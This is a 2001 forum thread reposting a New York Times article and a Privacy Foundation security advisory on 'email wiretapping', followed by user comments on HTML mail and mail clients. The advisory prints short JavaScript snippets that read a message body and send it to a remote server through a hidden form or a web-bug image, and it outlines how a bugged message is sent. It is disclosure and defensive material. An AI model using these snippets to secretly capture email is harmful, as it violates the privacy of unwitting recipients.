http://www.nytimes.com/2001/02/05/technology/05JAVA.html?printpage=yes

February 5, 2001

A New Trick Gives Snoops Easy Access to E-Mail

By AMY HARMON

or those still harboring the illusion that e-mail exchanges are private, a watchdog group has uncovered a new trick that enables someone to essentially bug an e-mail message so that the spy would be privy to any comments that a recipient might add as the message is forwarded to others or sent back and forth.

The maneuver does not take advantage of any security flaw in e-mail software. It is simply one feature of a fancier and increasingly common form of e-mail known as HTML mail, which enables users to send and receive e-mail messages that look and act like a Web page.

With the spying technique, a few lines of a programming language called JavaScript, often used on Web sites to create pop-up windows and navigational aids, can be embedded in such a message. This implant, not visible to the recipient, enables the text to be secretly returned to its original sender every time it is forwarded to another recipient, as long as the recipients' e-mail programs are set up to read JavaScript.

Although HTML e-mail often includes images and animations, it can also be made to look like a plain text e-mail. To figure out whether a message is HTML or text, a user can right-click on the message body. If one of the menu choices that appears is "view source," it is HTML mail. By choosing "view source," a user would be able to see any JavaScript code embedded in the message. But whether the code was designed to bug a message would likely still be difficult to recognize for someone unfamiliar with the computer language.

"I looked at this and I said, `Whoa,' because it lets you spy on people, and it's so easy," said Richard M. Smith, chief technology officer for the Privacy Foundation, an educational and research organization based in Denver that plans to publicize and demonstrate the technique today.

"Most of us won't release a computer virus, but this is something people would use, particularly if a service started offering it," Mr. Smith said. "It's just kind of human nature."

Invisible tags sometimes called Web bugs are widely used in HTML e-mail by marketers and others to detect whether an individual has opened an e-mail message. The Congressional Privacy Caucus has announced plans to hold hearings to investigate the use of Web bugs later this month. Mr. Smith said that it was now clear that JavaScript could be used to create a more powerful Web bug so that not only can someone find out when a message is read, but also what is being said about it.

Because many e-mail users continue to hit "reply" during long e-mail exchanges rather than initiating new messages, the JavaScript code could enable an individual to eavesdrop on an entire conversation between business associates about a proposal he or she had e-mailed to one of them, for example. It could also be used to harvest e-mail addresses when a message like a joke was forwarded over and over to groups of people across the Internet.

The widely used e-mail programs that are vulnerable to the exploit include Microsoft Outlook, Outlook Express and Netscape Messenger 6. America Online users and users of Web-based e-mail programs like Hotmail would not be affected.

By going to the "preferences" command under the edit menu in Netscape Messenger, users can turn off JavaScript in about five steps. To disable JavaScript in Microsoft Outlook and Outlook Express takes about 15 steps, which are outlined on the privacy foundation Web site at www.privacyfoundation.org. The newest version of Outlook Express comes with JavaScript turned off, as a result of customer feedback, a Microsoft spokesman said.

"At this point in time, it's really a personal choice everybody has to make whether they are more concerned about a security risk or about the advanced functionality you get by having these features enabled," said Lisa Gurrey, product manager for Microsoft Office. "We are just doing the best we can to give our customers different options."

But turning off JavaScript does not necessarily mean that e-mail cannot be spied on, because a bugged message will still be returned to its original sender if it is replied to or forwarded to someone who reads the message with an e-mail program that is vulnerable.

Today, the Privacy Foundation plans to provide public demonstrations of the process, which the group calls "e-mail wiretapping" and believes to be illegal. The group is calling for the major vendors of e-mail programs to provide their software with JavaScript automatically turned off. The potential for such e-mail spying was first discovered by Carl Voth, an engineer in British Columbia, who brought it to the attention of Mr. Smith at the Privacy Foundation.

"What bothers me is that in this case, my vulnerability is a function of what you do," Mr. Voth said. "I can be careful, I can take every precaution, I can turn off JavaScript, and it doesn't matter. If my neighbor isn't diligent and I send him an e-mail, I'm still vulnerable."

-- Anonymous, February 05, 2001

Answers

MORE

http://www.privacyfoundation.org/advisories/advemailwiretap.html#users

Advisory on Email
Email Wiretapping
Richard M. Smith, Chief Technology Officer, Privacy Foundation
2/05/01


Introduction
Vendor Responses
Recommendations for Users
Recommendations for Vendors of Email Readers
How Email Wiretapping Works
Related Links

---

Introduction

The Privacy Foundation has recently learned of an exploit that allows the sender of an email message to see what has been written when the message is forwarded with comments to other recipients. We have nicknamed this problem "email wiretapping" because the exploit allows someone to surreptitiously monitor written messages attached to forwarded messages.

Some of the possible ways that this exploit might be used include:

Monitoring the path of a confidential email message and written comments attached.

In a business negotiation conducted via email, one side can learn inside information from the other side as the proposal is discussed through the recipient company's internal email system.

A bugged email message could capture thousands of email addresses as the forwarded message is sent around the world.

Commercial entities, particularly those based offshore, may seek to offer email wiretapping as a service.

The exploit requires the person reading a wiretapped email message to be using an HTML-enabled email reader that also has JavaScript turned on by default. Affected email readers include Outlook, Outlook Express, and Netscape 6 Mail. Earlier versions of Netscape are not affected because they do not support all the features of the JavaScript Document Object Model (DOM). Also Eudora and the AOL 6.0 email readers are not affected because JavaScript is turned off by default. Hotmail and other Web-based email systems automatically remove JavaScript programs from incoming email messages and therefore are not vulnerable.

The exploit is made possible because JavaScript is able to read text in an email message. If a message is forwarded to someone else, the hidden JavaScript code in the page can read any text that has been added to the message when it is forwarded. This JavaScript code executes when the forwarded message is read. The JavaScript code then silently sends off this text using a Web bug, or a hidden form, to a Web server belonging to the original sender of the message. The sender can then retrieve the text and read it.

This exploit does not make any use of any programming errors in an email reader or JavaScript. Rather it uses standard documented features of JavaScript.

A wiretapped email message is difficult to detect. An individual can avoid the email wiretap by turning off JavaScript in the email reader. However, if the individual forwards the message to someone who has JavaScript turned on, that recipient's forwarded messages can still be wiretapped. In addition, copying the original message into a new email, rather than forwarding it, may not defeat the exploit.

The Privacy Foundation would like to thank Carl Voth for bringing this issue to our attention. See the Related Links section below for Carl's original 1998 write-up regarding what he termed the "Reaper Exploit."
TOP OF PAGE

---

Vendor Responses

Both Carl Voth and the Privacy Foundation have notified Microsoft of the exploit in Outlook and Outlook Express. The Foundation has also made Netscape aware of the issue. Both companies confirmed that the problem exists and recommend that users who are concerned about it to turn off JavaScript in HTML email messages.
TOP OF PAGE.

---

Recommendations for Users

It is possible to partially eliminate the email wiretapping problem by turning off JavaScript in HTML email messages. Here are instructions for various email readers vulnerable to the problem:

Outlook 2000
Outlook Express 5
Netscape Messenger 6

Turning off JavaScript is only a partial solution because a wiretapped message will still work if it is replied to, or forwarded, to someone whose email program is vulnerable to the exploit.

Another approach for Outlook users is to download and install the Outlook email security patch, available at:

h ttp://office.microsoft.com/2000/downloaddetails/Out2ksec.htm
This patch disables JavaScript in email and provides protection against computer viruses transmitted as attached files. This patch was created by Microsoft after the ILOVEYOU virus last year. Because the patch removes some functionality from Outlook, it is a good idea to carefully read over the patch description before installing it.

Please note that turning off JavaScript in email still leaves JavaScript enabled in a Web browser. Because JavaScript is used extensively at Web sites, the Privacy Foundation does not recommend turning off JavaScript in a Web browser.
TOP OF PAGE

---

Recommendations for Vendors of Email Readers

Because of the email wiretapping problem and other security holes, the Privacy Foundation strongly recommends that all email readers that support HTML-enabled messages should have JavaScript turned off by default. We do not believe that users should have to reconfigure computer settings to assure the security of their email. JavaScript is rarely used in email today and seems of little utility.

Another possible solution is to have an email reader automatically remove any embedded scripts in an HTML email message when the message is re-sent.
TOP OF PAGE

---

How Email Wiretapping Works

The email wiretapping exploit requires HTML email messages to work. An HTML email message uses the HTML formatting language of Web pages to provide email messages with graphics and text formatting features such as bold, italics, and different-sized fonts. HTML email messages look like Web pages on the screen and are much more flexible than plain text messages. Most of the popular email readers for desktop systems support HTML email messages. These readers include Eudora, Netscape Messenger, Outlook, and Outlook Express.

Just like Web pages, HTML email messages can contain small JavaScript programs embedded in them. JavaScript code is extremely popular on Web pages. Typical uses include validation of form information and navigational aids for a Web site. To date, however, the use of JavaScript in email messages has been minimal because there does not seem much call for it.

The email wiretapping exploit uses a small JavaScript program to work. The exploit is not based on program bugs in JavaScript but instead uses standard JavaScript features that are well documented in almost all books that teach JavaScript programming.

The actual JavaScript code can be embedded in an HTML message using an HTML <script> tag. Alternatively the script code can be loaded from an external JavaScript file using an HTML <script src=> tag. This external file is downloaded from a remote Web server when a wiretapped message is read.

The exploit has two pieces to it. The first piece reads the entire content of a message into a JavaScript variable. The second piece sends off the content of the email message to a remote Web server.

The first piece of the exploit is trivial in nature and can be written with a single line of JavaScript code. This line of code uses JavaScript's Document Object Model (DOM) to read the contents of the message into a variable. Here's what this line of code looks like:

contents = document.body.innerHTML;

The second piece of the exploit is used to send back the message to a remote Web site. There are two different approaches for doing this. With the first approach, JavaScript places the contents of the message into a hidden form on the message and then submits the form to a remote server.

The JavaScript code for doing this submit would look something like this:

document.hiddenForm.message.value = contents;
document.hiddenForm.submit();

The hidden- form method can be detected by a user, if the user has configured their Web browser to warn them any time information is submitted as a form to a Web site.

The content of the message can also be sent off using a Web bug. Unlike the hidden-form method, the Web bug method is not easily detectable. A Web bug is simply an invisible image used to transmit information from a browser back to a Web server. The content of an email message can be sent back in the query string of the URL of the Web bug image.

Here is what the Web bug code might look like:

webBug = new Image();
webBug.src = baseURL + "?message=" + escape(contents);

To actually make the email wiretapping code work reliably in all the different email readers requires more work to program around various technical issues and quirks in the email readers. The resulting script takes about 30 lines of code. The Privacy Center at the University of Denver has built and tested a more robust script for wiretapping, but will not be releasing it. However, a programmer with a good working knowledge of JavaScript could create a similar script in one to two days.

After the JavaScript wiretap is written, the wiretapper also has to arrange a way to turn the messages produced by the wiretap into an ordinary readable form. This "back end" can be constructed by an experienced CGI programmer in a day or two.

To launch a "bugged" message is actually very simple. Here are the steps:

The email wiretapping script is put on a blank Web page.
The blank Web page is viewed in the Web browser.
The "Send page" command is selected in the Web browser and an email reader starts up.
The message text is entered at the top of the page in the email program.
The message is then sent off.

Some email readers like Outlook Express also allow script code to be copied and pasted into an HTML email message directly while the message is being edited.

The email wiretapping script is then executed each and every time the message is read by someone using a vulnerable reader. If they then forward the message or reply to the message, the new messages are also "bugged" because the script is copied from the original message to the new message.

If a wiretapped message were discovered, it would be possible to determine where the script code was sending the text. By viewing the source code of the message and reading through the JavaScript code, it would be possible to see the Web server where the message text was sent. Even if the author of the code attempted to hide the destination, adding debug code to the script could be used to discover the destination. However the destination could be to a Web service company and not a Web server belonging to the person doing the wiretapping.

TOP OF PAGE

-- Anonymous, February 05, 2001

-- Anonymous, February 05, 2001

Thanks but I already read this earlier when I read your email Charlie :)

http://ww w.cnn.com/TECH/computing/9908/30/hotmail.02/

-- Anonymous, February 05, 2001

NOT the same thing at all. The hotmail hole was a specific thing. This new pain is GENERIC and hardly clever.

The only stop is for people to sent ASCII /TEXT and stop with all the fancy emails or use ONLY very secure web mail sites where you have them trying to defend also.

-- Anonymous, February 05, 2001

Interesting info Charlie. I also found it amusing that Microsoft, whose every product is full of holes and whose websites have been hacked so much it isn't even funny, is working with several other companies to develop a secure Internet "voting" system. Oh, yeah, THAT should really be secure.....

-- Anonymous, February 05, 2001

I've never understood why folks wanted their E-mail to include HTML in the first place. Then again, I suppose there are people who present and receive FAR more interesting mail than I.

I'm not at all concerned about who snoops on my E-mail. [Wasn't this already discussed a while back?] My inbox and outbox share one common theme: zzzzzzzzzz.

I'd really be more interested in why *I*'m getting spam asking if I'm horny and point me to sites that display females, or the spam that tells me about Viagra or how to cure baldness. My "block" list is already so long these days that I don't even bother to include more. I can tell by the subject line that I'm not interested and simply click on delete.

-- Anonymous, February 06, 2001

I don't think I've EVER sent an HTML email, but I do receive them sometimes - so it's nice to be able to view it with peace of mind ...

I use the oldie but goodie, Pegasus Mail!

Pegasus does not implement the HTTP protocol and its HTML viewer will not attempt to include any content referenced by hyperlinks in the message. It will display the HTML present in the message itself but not activate scripts. So there will be no chance for any remote server to place and manipulate any cookie.

Also I just plain like it. :-)

-- Anonymous, February 14, 2001